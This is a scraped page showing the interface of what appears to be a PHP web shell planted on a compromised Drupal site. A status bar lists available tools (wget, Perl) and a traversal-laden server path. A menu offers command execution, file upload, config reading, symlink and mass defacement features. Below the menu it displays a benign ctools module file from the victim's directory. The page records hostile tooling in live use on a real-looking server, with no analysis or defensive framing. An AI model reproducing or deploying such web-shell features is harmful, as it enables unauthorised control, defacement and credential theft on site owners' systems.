OFF | cURL : OFF | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/www/html/hpsc/../hpsclab/js/../../hpsc/css/../../antarctic-drupal-7.89/sites/all/modules/missing_module/../ctools/term_depth/ |
Home | ☍ Command | ☍ Upload File | ☍Info Server | ☍ Buat File | ☍ Mass deface | ☍ Jumping | ☍ Config | ☍ Symlink | ☍ About |
---|
<?php /** * @file */ function term_depth_ctools_plugin_directory($owner, $plugin) { if ($owner == 'ctools' && $plugin == 'access') { return 'plugins/' . $plugin; } }